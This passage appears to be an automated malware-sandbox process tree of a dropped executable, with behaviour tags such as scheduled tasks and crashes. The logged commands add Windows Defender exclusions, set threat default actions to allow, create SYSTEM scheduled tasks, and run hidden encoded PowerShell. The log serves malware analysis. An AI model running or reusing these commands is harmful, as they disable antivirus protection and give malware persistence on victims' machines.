                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      8⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5984
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe\" z0 /badidB 757674 /S" /V1 /F
                                5⤵
                                • Drops file in Windows directory
                                • Scheduled Task/Job: Scheduled Task
                                PID:6108
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1048
                                5⤵
                                • Program crash
                                PID:5632
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2304
                              4⤵
                              • Program crash
                              PID:5600
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2524
                              4⤵
                              • Program crash
                              PID:5640
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2020
                              4⤵
                              • Program crash
                              PID:5664
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2540
                              4⤵
                              • Program crash
                              PID:5688
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2336
                              4⤵
                              • Program crash
                              PID:6076
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1736
                              4⤵
                              • Program crash
                              PID:884
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2484
                              4⤵
                              • Program crash
                              PID:680
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1736
                              4⤵
                              • Program crash
                              PID:5488
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies registry class
                        PID:4808
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        PID:5652
                      • C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe
                        C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe z0 /badidB 757674 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops desktop.ini file(s)
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:5284
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5304
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                              PID:5356
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                4⤵
                                  PID:5472
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:5504
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:5496
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:3588
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:3012
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:3520
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:5292
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:5548
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:1048
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:5544
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:3512
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:2092
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:3140
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:4748
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:5604
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:5600
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:2096
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:1336
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:5732
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:2704
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:4092
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:5756
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:1216
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:244
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:5804
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:3400
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:5596
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:5948
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:6004
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:6076
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:5808
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:5848
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:3600
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
                                                                                              3⤵
                                                                                                PID:6108
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:1164
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:3224
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:3952
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:1908
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:5768
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4940
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                              PID:1332
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:5592
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:460
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:5144
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:1888
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2400
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:5232
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:2524
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "gRknkcelR" /SC once /ST 04:47:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                          2⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:4276
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /run /I /tn "gRknkcelR"
                                                                                                                          2⤵
                                                                                                                            PID:852
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /DELETE /F /TN "gRknkcelR"
                                                                                                                            2⤵
                                                                                                                              PID:2200
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 00:17:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe\" Wy /GCDxdidHR 757674 /S" /V1 /F
                                                                                                                              2⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:5860
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
                                                                                                                              2⤵
                                                                                                                                PID:6080
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 776
                                                                                                                                2⤵
                                                                                                                                • Program crash
                                                                                                                                PID:5840
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                              1⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4400
